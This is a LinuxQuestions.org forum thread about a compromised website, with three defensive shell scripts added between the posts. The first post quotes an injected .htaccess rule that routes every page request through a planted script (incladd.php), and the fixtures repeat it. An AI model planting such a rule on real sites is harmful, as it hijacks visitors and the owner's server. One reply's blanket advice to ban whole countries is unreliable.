LinuxQuestions.org


bhm8hwcm 04-10-2009 03:14 AM

Site compromised...htaccess modified
 
I host a few sites on my own server and recently one of them was compromised. I was alerted by Google that they were dropping me from their index due to hidden links. Upon further inspection I found that my .htaccess file was altered with:

RewriteCond /home/sitename/public_html/mailer/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !ca0272.php$
RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /mailer/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]

I have removed the files and so far things are ok.

My question is what would allow this type of thing to happen? I assume my username and password would have to be known to do this?

Any suggestions on starting points where I should look to fix things?

As well I need to get my site reindexed as it is important to me and I was thinking of hiring some kind of outside service to review my server setup security wise. Any recommendations on such service providers that are reasonably priced?
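The injected rule above is easy to spot once you know its shape: a RewriteCond that tests an absolute filesystem path with -f (so the rule disables itself if the handler is deleted) and a RewriteRule that hands %{SCRIPT_FILENAME} to a single PHP script. The following script is an added example, not code from the thread or from any of its posters; it scans every .htaccess below the directories you name for those two traits. Both patterns are assumptions derived only from the rule quoted in the post, and the two sample sites it builds are constructed.

```shell
#!/bin/sh
# Added example, not from the thread: a heuristic scan for .htaccess files that
# carry a rewrite of the kind quoted in the post (every PHP/HTML request routed
# through an injected handler). The two patterns are assumptions derived only
# from the rule shown above; adjust them for the rewrites your own sites use.

# scan_htaccess FILE
# Prints each suspicious line with its number. Returns 0 if anything matched,
# 1 if the file looks clean.
scan_htaccess() {
    file=$1
    hits=0
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case $line in
            # A RewriteCond that tests an absolute filesystem path with -f:
            # the injected rule checks that its own handler is still present.
            RewriteCond\ /*\ -f*)
                printf '%s:%d: -f test on absolute path: %s\n' "$file" "$n" "$line"
                hits=$((hits + 1)) ;;
            # A RewriteRule whose target receives the real script name as a
            # parameter, i.e. a wrapper that runs before the requested page.
            RewriteRule*SCRIPT_FILENAME*)
                printf '%s:%d: SCRIPT_FILENAME passed to a handler: %s\n' "$file" "$n" "$line"
                hits=$((hits + 1)) ;;
        esac
    done < "$file"
    [ "$hits" -gt 0 ]
}

# scan_webroots DIR...
# Lists every .htaccess below the given directories that trips the heuristic.
scan_webroots() {
    find "$@" -type f -name .htaccess 2>/dev/null | while IFS= read -r f; do
        if scan_htaccess "$f" >/dev/null; then
            printf '%s\n' "$f"
        fi
    done
}

# make_fixture
# Builds two constructed sites in a temporary directory: one with an ordinary
# front-controller rewrite, one carrying the rule quoted in the post.
# Prints the temporary directory's path.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/clean/public_html" "$root/infected/public_html"
    cat > "$root/clean/public_html/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
EOF
    cat > "$root/infected/public_html/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond /home/sitename/public_html/mailer/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /mailer/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]
EOF
    printf '%s\n' "$root"
}

# Run with --demo to scan the constructed fixture; otherwise pass your own
# web-root directories, e.g.  sh scan_htaccess.sh /home/*/public_html
if [ "${1:-}" = "--demo" ]; then
    root=$(make_fixture)
    scan_webroots "$root"
    rm -rf "$root"
elif [ $# -gt 0 ]; then
    scan_webroots "$@"
fi
```

The ordinary front-controller rewrite in the clean sample (conditions on %{REQUEST_FILENAME}, target /index.php) does not trip either pattern, while the infected sample is reported twice. A legitimate RewriteCond on an absolute path (a maintenance-page check, for instance) would also be flagged, so treat a hit as something to read, not as proof of compromise.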

tronayne 04-10-2009 07:11 AM

Your .htaccess file(s) should be owned by root, group apache and mode should be 0640 for starters (the mode can be 0644 but probably better 0640). Generally, the files and directories in your htdocs directory ought to be owned by root, group apache (or root) and mode set as restricted as necessary to be usable (but no public read, write or execute) -- this depends upon the application, but generally directories can be mode 0750 and files mode 0640 unless the files need to be executable in which case you want to set them to 750 (start with the most restrictive and change mode(s) if things don't work right).

Check your log (probably /var/log/messages) to see if somebody managed to guess a password and get into your system. You're looking, mostly, for log entries that contain the pattern sshd or password.

If somebody did guess a password, you've got some work to do -- first, change the root password to a pattern containing letters, punctuation and digits at least eight characters long. Look at /etc/shadow (this is where the passwords are actually stored); it should look pretty much like this
Code:

root:$1$Kmh1qikS$e/d9aya89zO2F0EfXkglq/:14268:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
user accounts start here

All that gobbledygook on the first line is the encrypted root password; the only account (other than user accounts) that should have a password in this file is root -- all the rest should be an asterisk!

Consider installing DenyHosts (http://denyhosts.sourceforge.net), which dynamically identifies bad actors and denies them access to your system with entries in /etc/hosts.deny; it also shares bad actors world-wide with other DenyHosts users (so you get a pretty good list of hosts to deny access to your system).

Consider installing IPTABLES country ban entries; ban at least China, Korea and possibly Russia, Bulgaria, Japan, India and Pakistan (where most of this crap comes from). You can get appropriate entries for doing this at http://www.countryipblocks.net.

Nobody (no user) needs read-write access to your htdocs tree -- including "you." Review the owner, group and mode settings and change them if needed. Change all your passwords (letters, punctuation and digits) and force your users to do the same (see the -e option for the passwd utility). If you have dead accounts, use the -i or -d option for the passwd utility to disable them.

Hope this helps some.
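Two of the checks in the reply above (only root and real user accounts should carry a hash in /etc/shadow; look through the log for sshd and password entries) can be scripted. The block below is an added example, not code from the thread or from its posters. The uid cut-off of 1000 for "user accounts" is an assumption (check UID_MIN in /etc/login.defs on your own system), and the passwd, shadow and auth-log samples it writes are constructed; only the root line is the one from the reply.

```shell
#!/bin/sh
# Added example, not from the thread: scripted versions of the reply's advice.
# shadow_audit flags accounts other than root and real users that carry a
# password hash, or that have no password at all; sshd_failure_counts and
# sshd_success_after_failures go through an auth log for guessing attempts
# and for a successful login from an address that had been failing.
# Assumption: uids below 1000 are system accounts. All sample data is
# constructed except the root shadow line, which is the reply's.

# shadow_audit SHADOW PASSWD [UID_MIN]
# Prints one line per problem found in SHADOW, using PASSWD to look up uids.
shadow_audit() {
    awk -F: -v uid_min="${3:-1000}" '
        FNR == NR { uid[$1] = $3; next }       # first file: passwd, name -> uid
        {
            name = $1; pw = $2
            if (pw == "") { print name ": empty password field, login needs no password"; next }
            if (pw ~ /^[*!]/) next                  # "*", "!", "!!": locked, as expected
            if (name == "root") next                # root is allowed a hash
            if (!(name in uid)) { print name ": hash present but no passwd entry"; next }
            if (uid[name] + 0 < uid_min + 0)
                print name ": system account (uid " uid[name] ") has a password hash"
        }' "$2" "$1"
}

# sshd_failure_counts LOG
# Prints "COUNT IP" for every source that produced "Failed password" lines,
# most failures first.
sshd_failure_counts() {
    awk '/sshd\[[0-9]+\]: Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i + 1)]++
         }
         END { for (ip in fails) print fails[ip], ip }' "$1" | sort -rn
}

# sshd_success_after_failures LOG
# Prints every accepted login whose source address had failed earlier in the
# same log: the trace a successful guess leaves behind.
sshd_success_after_failures() {
    awk '/sshd\[[0-9]+\]: Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i + 1)]++
         }
         /sshd\[[0-9]+\]: Accepted (password|publickey) for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
             if (fails[ip] > 0) print fails[ip] " failures then success from " ip ": " $0
         }' "$1"
}

# make_fixture
# Writes constructed passwd, shadow and auth-log samples to a temporary
# directory and prints its path. Hashes other than root's are placeholders.
make_fixture() {
    d=$(mktemp -d)
    cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
EOF
    cat > "$d/shadow" <<'EOF'
root:$1$Kmh1qikS$e/d9aya89zO2F0EfXkglq/:14268:0:::::
bin:*:9797:0:::::
ftp::9797:0:::::
apache:$1$c0nstruc$tedPlaceholderHashApache/:14268:0:::::
alice:$1$c0nstruc$tedPlaceholderHashAlice./:14268:0:99999:7:::
EOF
    cat > "$d/auth.log" <<'EOF'
Apr 10 02:13:41 host sshd[2012]: Failed password for root from 203.0.113.7 port 51234 ssh2
Apr 10 02:13:45 host sshd[2012]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2
Apr 10 02:13:50 host sshd[2015]: Failed password for root from 198.51.100.5 port 44410 ssh2
Apr 10 02:14:02 host sshd[2031]: Accepted password for root from 203.0.113.7 port 51300 ssh2
Apr 10 02:20:11 host sshd[2099]: Accepted publickey for alice from 192.0.2.10 port 40000 ssh2
EOF
    printf '%s\n' "$d"
}

# Run with --demo to exercise the constructed samples; on a real host call
# e.g.  shadow_audit /etc/shadow /etc/passwd  (as root) and
#       sshd_success_after_failures /var/log/messages
if [ "${1:-}" = "--demo" ]; then
    d=$(make_fixture)
    shadow_audit "$d/shadow" "$d/passwd"
    sshd_failure_counts "$d/auth.log"
    sshd_success_after_failures "$d/auth.log"
    rm -rf "$d"
fi
```

On the constructed sample, shadow_audit reports ftp (empty password field) and apache (a system account with a hash), alice passes because her uid is above the cut-off, and the log functions show 203.0.113.7 failing twice and then logging in as root, which is exactly the sequence worth chasing down. On Debian-style systems the sshd lines live in /var/log/auth.log rather than /var/log/messages.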

sleddog 04-10-2009 09:15 AM

It sounds like bhm8hwcm is doing virtual hosting (more than one domain) with webroots at /home/*/username/public_html. So the security of Apache's htdocs directory isn't really the issue here.

A quick google for "incladd.php" turns up lots of similar incidents. The cause is most likely an exploited web script running on the affected domain, possibly Joomla or an addon or some other CMS/blog/forum package.

What I'd suggest you do is:

- Take the site offline now before it creates more trouble.
- Research "incladd.php" to find commonalities with your setup, to identify the source of the problem. Fixing .htaccess is not a solution, it will happen again.
- Rebuild the site from scratch, using the latest version of all web applications. Be very wary of any third-party modules.

Regarding ownership and permissions, all files and directories should be owned by the account user. Permissions for files should be no higher than 644 (including .htaccess), and directories no higher than 755.

Some CMSs/blogs/forums instruct you to chmod .htaccess to 777 so that the setup script can write to it. Once the setup is done you should immediately change .htaccess permissions to 644, or else you're wide open to this kind of exploit. Any file or directory that is writable by Apache can lead to trouble if you are running a web application that has known exploits.
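The ceiling given in this reply (files no higher than 644, directories no higher than 755, everything owned by the account user) is the kind of thing worth checking after every installer run, since a setup script that asked for a 777 .htaccess leaves the web server able to rewrite it. The script below is an added example, not code from the thread or from its posters: it lists what breaks those limits under a web root and can apply them. The public_html layout it builds is constructed; the owner check uses whatever account name you pass.

```shell
#!/bin/sh
# Added example, not from the thread: audit a web root against the limits in
# the reply above (files at most 644, directories at most 755, all owned by
# the account user) and, on request, apply them. The tree built by
# make_fixture is constructed.

# audit_webroot DIR [OWNER]
# Prints one line per file or directory that breaks the rules; prints nothing
# when the tree is clean.
audit_webroot() {
    dir=$1
    owner=${2:-}
    # Directories writable by group or others exceed 755.
    find "$dir" -type d \( -perm -g=w -o -perm -o=w \) | while IFS= read -r p; do
        printf '%s: directory writable by group/other (want 755)\n' "$p"
    done
    # Files writable by group or others exceed 644; this is the .htaccess case
    # the reply describes, where the web server itself can rewrite the file.
    find "$dir" -type f \( -perm -g=w -o -perm -o=w \) | while IFS= read -r p; do
        printf '%s: file writable by group/other (want 644)\n' "$p"
    done
    # Anything not owned by the account user.
    if [ -n "$owner" ]; then
        find "$dir" ! -user "$owner" | while IFS= read -r p; do
            printf '%s: not owned by %s\n' "$p" "$owner"
        done
    fi
}

# count_violations DIR [OWNER]
# Number of lines audit_webroot prints (0 when clean).
count_violations() {
    audit_webroot "$@" | grep -c '' || true
}

# fix_webroot DIR
# Applies 755 to directories and 644 to files, the reply's recommended ceiling.
fix_webroot() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# make_fixture
# Constructed public_html with one world-writable .htaccess (as an installer
# might leave it) and one 777 upload directory. Prints the temporary path.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/public_html/images" "$root/public_html/uploads"
    printf 'RewriteEngine On\n' > "$root/public_html/.htaccess"
    printf '<?php echo "hello"; ?>\n' > "$root/public_html/index.php"
    chmod 755 "$root/public_html" "$root/public_html/images"
    chmod 777 "$root/public_html/uploads"
    chmod 644 "$root/public_html/index.php"
    chmod 666 "$root/public_html/.htaccess"
    printf '%s\n' "$root"
}

# Run with --demo to audit and then fix the constructed tree; on a real host
# call e.g.  audit_webroot /home/sitename/public_html sitename
if [ "${1:-}" = "--demo" ]; then
    root=$(make_fixture)
    audit_webroot "$root" "$(id -un)"
    fix_webroot "$root"
    printf 'violations after fix: %s\n' "$(count_violations "$root" "$(id -un)")"
    rm -rf "$root"
fi
```

On the constructed tree the audit reports the 666 .htaccess and the 777 uploads directory; after fix_webroot it reports nothing. Run fix_webroot only once you have confirmed the application does not genuinely need a writable directory (an upload area, a cache), and give such directories the narrowest ownership that still works rather than 777.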
